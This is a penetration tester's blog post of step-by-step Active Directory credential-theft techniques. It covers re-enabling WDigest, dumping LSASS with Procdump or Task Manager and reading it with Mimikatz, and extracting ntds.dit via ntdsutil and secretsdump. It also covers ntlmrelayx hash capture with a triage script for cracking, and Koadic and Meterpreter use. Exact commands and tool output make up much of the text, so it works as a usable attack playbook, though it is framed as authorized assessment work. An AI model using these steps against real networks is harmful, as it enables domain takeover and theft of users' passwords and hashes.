Helpful Tricks I Use to Get Domain Admin
So I was recently on an internal assessment (thanks Hexcartel) and got to use some cool tricks I felt like sharing. Behold:
Dumping Lsass on Windows 10 😋
Quick and Easy
So, we all know you can’t just blast Crackmapexec with a C2 stager and get shells raining down like you could on an unpatched Windows 7 network (see my post “How I use Koadic on Internals” for that). On Windows 10 we have to be a little more sophisticated. Say you’ve gotten local admin creds to a workstation, a Domain Admin also uses that same workstation, but you can’t find a way to get their creds. Since you have local admin on the box, you can use Crackmapexec’s wdigest module to re-enable WDigest credential caching. Under the hood that sets UseLogonCredential to 1 under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest; Windows 8.1 / Server 2012 R2 and later stop LSASS from keeping plaintext passwords unless that value is set. Once it is, the next time the user logs on to that system (interactively or over RDP) their plaintext password is kept in LSASS memory and you can dump it. One caveat: flipping UseLogonCredential is a registry write on a key that defenders know to watch, so on a well-instrumented network expect this to be noticed.
You have a few ways of dumping their creds. The easy way: RDP into the host after hours, open Task Manager (elevated), find lsass.exe on the Details tab, right-click it and select Create dump file. Task Manager writes lsass.DMP into the current user’s %LOCALAPPDATA%\Temp directory; copy that file back to your attacking machine and run Mimikatz against it offline to get plaintext creds. Done.
Procdump
The other way is to use Procdump [thanks N00py] to create the dump file. Because it is a signed Microsoft Sysinternals binary it usually slides past plain antivirus, but don’t assume it is invisible: EDR products commonly alert on any process opening lsass.exe with dump-level access, signed or not. Every time I do this I use this ARTICLE, which walks through dumping lsass with Procdump and extracting the creds locally with Mimikatz; it’s basically the long version of this tip. Using Procdump instead of RDPing gives you more flexibility, because the dump can be created from the command line over whatever remote execution you already have rather than from a desktop session.
Getting The Dump Back 👈
A great way to get the file back off the Windows 10 system is smbclient. I often completely forget about smbclient when working on internals; it gets overshadowed by the sexiness of Crackmapexec, but it’s very good for pulling files down quickly (connect to the C$ admin share with your local admin creds and get the dump). Another option is SCP, since Windows 10 now ships with the OpenSSH client tools. Between those two you should be fine getting the file back to your attacking machine. If neither works: bitsadmin? PowerShell? Time to Google…
Once you have the file locally, get it onto a Windows system that has Mimikatz on it (comment below if you can do this on Linux; pypykatz will parse the same minidump there). Mimikatz is picky about minidumps: parse the dump on the same architecture, and ideally the same Windows build, as the machine it was taken from, or sekurlsa will error out on the minidump header. Once you have everything ready, follow the steps here or below.
So here’s the TL;DR of the whole thing:
Steps 👟
1. Enable WDigest:
crackmapexec smb TARGETHOST -M wdigest -o ACTION=enable
2. Wait a while for the target user to log on to their system.
3. Use smbclient, Crackmapexec or whatever to upload Procdump and dump lsass with it:
C:\users\ANOTHER-USER\desktop\procdump.exe -accepteula -ma lsass.exe lsass.dmp
OR, after hours, RDP in to the target system ➡ open Task Manager and go to the Details tab ➡ right-click lsass.exe and select Create dump file.
4. Download the dump file to your attacking machine.
5. Use Mimikatz locally against the dump file with the following commands:
mimikatz # sekurlsa::minidump YOUR_DUMP_FILE.dmp
(Mimikatz answers “Switch to MINIDUMP”, confirming it will read the file instead of live LSASS)
mimikatz # sekurlsa::logonPasswords
6. LOOK CLOSELY at the output. IF YOU DO NOT LOOK CLOSELY YOU COULD MISS A DOMAIN ADMIN CRED!!! A good tip to make sure you’re not missing anything is to save the output, copy it to your Linux box and grep it for passwords. I usually do:
grep -i -B2 password mimikatz_output.txt
This prints every Password line together with the Username and Domain lines above it, so you can see who each credential belongs to. If the user logged in between you enabling WDigest and dumping lsass, you should have the target user’s creds in plain text!
Notes 📝
One thing to note about having Mimikatz on Windows 10: you’ll need to add an exclusion folder in your Defender settings, or your own AV will keep quarantining it. I’m also sure there’s someone out there that would read all this and say… “Why don’t you just use/do XYZ to do all this instantly?” To you I say, “leave a comment below! Grace us with your knowledge and wisdom!”
Dumping NTDS Manually With A Native Windows Tool
Sometimes, due to antivirus or restrictions on tooling, you can’t use Crackmapexec to dump the DC when the time comes and you have to do it manually. A great way to do this is with another native Windows tool, ntdsutil, which ships with the AD DS role and so is present on every domain controller. Run it from an elevated prompt on the DC and create an “Install From Media” (IFM) set: a consistent copy of ntds.dit taken from a VSS snapshot, plus the SYSTEM and SECURITY hives you need to decrypt it. If you have the time you can read this ARTICLE on it:
C:\Users\Posh> ntdsutil
ntdsutil: activate instance ntds
Active instance set to "ntds".
ntdsutil: ifm
ifm: create full c:\dumpty
Creating snapshot...
Snapshot set {159231da-b786-465e-a70f-aacd369d8487} generated successfully.
Snapshot {179aaee5-ddaf-4be6-b77e-7bd64771de86} mounted as C:\$SNAP_201910081913_VOLUMEC$\
Snapshot {179aaee5-ddaf-4be6-b77e-7bd64771de86} is already mounted.
Initiating DEFRAGMENTATION mode...
Source Database: C:\$SNAP_201910081913_VOLUMEC$\Windows\NTDS\ntds.dit
Target Database: c:\dumpty\Active Directory\ntds.dit
Defragmentation Status (% complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Copying registry files...
Copying c:\dumpty\registry\SYSTEM
Copying c:\dumpty\registry\SECURITY
Snapshot {179aaee5-ddaf-4be6-b77e-7bd64771de86} unmounted.
IFM media created successfully in c:\dumpty
ifm: quit
ntdsutil: quit
// Download ntds.dit and the two hives from the DC with smbclient (connect to the admin share, e.g. smbclient //DC-HOSTNAME/C$ -U 'DOMAIN/user', then cd into dumpty)
smb: \dumpty\Active Directory\> get ntds.dit
getting file \dumpty\Active Directory\ntds.dit of size 119554048 as ntds.dit (85282.7 KiloBytes/sec) (average 85282.7 KiloBytes/sec)
smb: \dumpty\registry\> get SECURITY
getting file \dumpty\registry\SECURITY of size 262144 as SECURITY (25599.8 KiloBytes/sec) (average 25600.0 KiloBytes/sec)
smb: \dumpty\registry\> get SYSTEM
getting file \dumpty\registry\SYSTEM of size 9961472 as SYSTEM (54044.4 KiloBytes/sec) (average 52547.4 KiloBytes/sec)
smb: \dumpty\Active Directory\> exit
Next, feed all three files to secretsdump.py to dump the domain’s AD credentials locally on your attacking machine. The LOCAL keyword tells it to parse the files you downloaded instead of connecting to a host:
⋊> ~/C/CREDS python /usr/share/doc/python-impacket/examples/secretsdump.py -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0x7u77e239a4dc745d0a21270c271a4509
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
...SNIP...
Notes 📝
Dumping this way locally can take a long time depending on your hardware and the size of ntds.dit. It won’t be lightning fast like Crackmapexec against a live DC, so don’t be shocked by this behavior.
Saving the Hashes you Relay 💼
Yea, it never dawned on me to look at the flags of NTLMrelayX until I looked at the flags of NTLMrelayX. Apparently there’s a ton of good features in there besides absentmindedly relaying NTLMv2s at targets.
NtlmrelayX Flags
⋊> /usr/local/bin/ntlmrelayx.py -h
...snip...
Main options:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
-t TARGET, --target TARGET
Target to relay the credentials to, can be an IP,
hostname or URL like smb://server:445 If unspecified,
it will relay back to the client
-tf TARGETSFILE File that contains targets by hostname or full URL,
one per line
-w Watch the target file for changes and update target
list automatically (only valid with -tf)
-i, --interactive Launch an smbclient console instead of executing a
command after a successful relay. This console will
listen locally on a tcp port and can be reached with
for example netcat.
-ip INTERFACE_IP, --interface-ip INTERFACE_IP
IP address of interface to bind SMB and HTTP servers
--no-smb-server Disables the SMB server
--no-http-server Disables the HTTP server
--smb-port SMB_PORT Port to listen on smb server
--http-port HTTP_PORT
Port to listen on http server
-ra, --random Randomize target selection (HTTP server only)
-r SMBSERVER Redirect HTTP requests to a file:// path on SMBSERVER
-l LOOTDIR, --lootdir LOOTDIR
Loot directory in which gathered loot such as SAM
dumps will be stored (default: current directory).
-of OUTPUT_FILE, --output-file OUTPUT_FILE
base output filename for encrypted hashes. Suffixes
will be added for ntlm and ntlmv2
-codec CODEC Sets encoding used (codec) from the target's output
(default "ascii"). If errors are detected, run
chcp.com at the target, map the result with
https://docs.python.org/2.4/lib/standard-
encodings.html and then execute ntlmrelayx.py again
with -codec and the corresponding codec
-smb2support SMB2 Support (experimental!)
-socks Launch a SOCKS proxy for the connection relayed
-wh WPAD_HOST, --wpad-host WPAD_HOST
Enable serving a WPAD file for Proxy Authentication
attack, setting the proxy host to the one supplied.
-wa WPAD_AUTH_NUM, --wpad-auth-num WPAD_AUTH_NUM
Prompt for authentication N times for clients without
MS16-077 installed before serving a WPAD file.
-6, --ipv6 Listen on both IPv6 and IPv4
--remove-mic Remove MIC (exploit CVE-2019-1040)
--serve-image SERVE_IMAGE
local path of the image that will we returned to
clients
SMB client options:
-e FILE File to execute on the target system. If not
specified, hashes will be dumped (secretsdump.py must
be in the same directory)
-c COMMAND Command to execute on target system. If not specified,
hashes will be dumped (secretsdump.py must be in the
same directory).
--enum-local-admins If relayed user is not admin, attempt SAMR lookup to
see who is (only works pre Win 10 Anniversary)
...snip...
Yea so, looking at the flags, you can use -of to specify a base output filename where NTLMrelayX will save the NetNTLMv1/v2 hashes it relays (suffixes are added for ntlm and ntlmv2). That way, if you have issues relaying commands or your target has some sort of antivirus blocking your attempts, you still have a chance to crack the hashes later. Keep in mind these are challenge-responses, not NT hashes: they can’t be passed or replayed later, only cracked (hashcat modes 5500/5600, or john).
Another interesting flag is --enum-local-admins. If the relayed user isn’t an admin on the target, NTLMrelayX does a SAMR lookup to try to figure out who is. Per the help text this only works against hosts older than the Windows 10 Anniversary Update, which is when Microsoft started restricting remote SAM calls by default, so sometimes it will fail and sometimes it won’t, but it’s better to have than not, that’s for sure!
The last flag I noticed recently was -i, which opens an smbclient-style session on a local TCP port after a successful relay; you connect to it with netcat. I haven’t played with this yet but it sounds useful. When -c commands aren’t working, this would be a useful alternative to start uploading or downloading some files. Sometimes admins leave big juicy password.xlsx files on their desktops that contain DA creds. This flag would be great!
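Once -of has been running for an afternoon, the capture file is full of repeats: the same workstation reauthenticates every few minutes, and machine accounts show up alongside users. The script below is an added example (mine, not from the original post or from Impacket) that triages such a file. NTLMrelayX writes one challenge-response per line as user::DOMAIN:field:field:field; the helper tells NetNTLMv1 from NetNTLMv2 by field width so each goes to the right hashcat mode (5500 and 5600), keeps one line per account, and sets aside machine accounts, whose random 120-character passwords aren’t worth cracking time. The capture lines embedded in it are constructed with fake hex.

```python
"""Added example: triage the NetNTLM challenge-responses ntlmrelayx saves with -of.

Not part of the original post or of Impacket. Sample lines are fabricated.
"""
import sys
from typing import Dict, List, NamedTuple, Optional

# Constructed sample of a -of capture file (fake challenge/response hex).
# NetNTLMv2: user::DOMAIN:serverchallenge(16 hex):NTProofStr(32 hex):blob
# NetNTLMv1: user::DOMAIN:LMresponse(48 hex):NTresponse(48 hex):serverchallenge(16 hex)
SAMPLE_CAPTURE = """\
j.doe::CORP:1122334455667788:0f1e2d3c4b5a69788796a5b4c3d2e1f0:0101000000000000c0653150de09d201aabbccddeeff00110000000002000800430052004f00500001000800570053003000310000000000
J.DOE::corp:8877665544332211:ffeeddccbbaa99887766554433221100:0101000000000000c0653150de09d20111223344556677880000000002000800430052004f00500001000800570053003000310000000000
da.admin::CORP:99aabbccddeeff00:00ff11ee22dd33cc44bb55aa66997788:0101000000000000c0653150de09d201deadbeefdeadbeef0000000002000800430052004f00500001000800570053003000310000000000
WKS01$::CORP:0011223344556677:aabbccddeeff00112233445566778899:0101000000000000c0653150de09d201cafebabecafebabe0000000002000800430052004f00500001000800570053003000310000000000
legacy.user::CORP:76365e2d142b5612980c67d057eb9efeee00ef1e3ad1d4a8:76365e2d142b5612980c67d057eb9efeee00ef1e3ad1d4a8:1122334455667788
"""


class Capture(NamedTuple):
    user: str
    domain: str
    mode: int      # hashcat mode: 5500 = NetNTLMv1, 5600 = NetNTLMv2
    line: str


def classify(line: str) -> Optional[Capture]:
    """Split a capture line and tell v1 from v2 by the width of its fields."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        return None
    user, _, domain, f3, f4, f5 = parts
    if len(f3) == 16 and len(f4) == 32 and len(f5) >= 64:
        return Capture(user, domain, 5600, line.strip())   # v2: challenge, NTProofStr, blob
    if len(f3) == 48 and len(f4) == 48 and len(f5) == 16:
        return Capture(user, domain, 5500, line.strip())   # v1: LM resp, NT resp, challenge
    return None


def triage(text: str, keep_machine_accounts: bool = False) -> Dict[int, List[str]]:
    """One line per (domain, account, mode); repeat captures of the same account are dropped."""
    out: Dict[int, List[str]] = {5500: [], 5600: []}
    seen = set()
    for raw in text.splitlines():
        cap = classify(raw)
        if cap is None:
            continue
        if cap.user.endswith("$") and not keep_machine_accounts:
            continue                      # machine account: not worth cracking
        key = (cap.domain.lower(), cap.user.lower(), cap.mode)
        if key in seen:
            continue
        seen.add(key)
        out[cap.mode].append(cap.line)
    return out


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CAPTURE
    for mode, lines in triage(text).items():
        print(f"hashcat -m {mode}: {len(lines)} unique account(s)")
        for line in lines:
            print("  ", line[:60] + "...")
```

Write each mode’s list to its own file and hand it to hashcat with the matching -m; the v1 bucket is the one to crack first, since NetNTLMv1 falls far faster than v2.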
Using Koadic and Bloodhound on Windows Servers 💣
More often than not, if you get access to a Windows Server 2008-2012 R2 box it lacks strong antivirus. Windows Defender only became a built-in component with Server 2016, so unless a third-party product is installed, you can usually use an mshta stager in Koadic to quickly dump memory with the Mimikatz module, or run the enum_domain_info module to quickly build a solid foundation of information.
Similarly, these servers can be a good place to set up shop for a while and do further enumeration. They will be more tolerant of things like BloodHound ingestors and maybe, dare I say, Meterpreter payloads. You could also use them for PowerUpSQL sessions if you’re hunting for sensitive information such as cardholder data or patient health information.
SMBCLIENT For File Transfers 💽
It can be a real pain getting files off a Windows machine back onto your attacking machine, and after hours of using Crackmapexec to get RCE everywhere it’s easy to forget about ol’ smbclient. But smbclient is a great companion for quickly downloading and uploading files, and knowing how to do it recursively helps too. So the tip: type these commands in your next smbclient session to enable recursive transfers. They toggle, so type them again if you need to turn them back off (the same toggles can be passed non-interactively with smbclient’s -c option):
* recurse # toggles recursion on, so mget/mput descend into subdirectories
* prompt # toggles off the yes/no prompt for each file
* mget / mput # download or upload multiple files matching a pattern (e.g. mget *)
_______________
< Ju$t d0 XYZ~! >
---------------
\ ____________
\ |__________|
/ /\
/ / \
/___________/___/|
| | |
| ==\ /== | |
| O O | \ \ |
| < | \ \|
/| | \ \
/ | \_____/ | / /
/ /| | / /|
/||\| | /||\/
-------------|
| | | |
<__/ \__>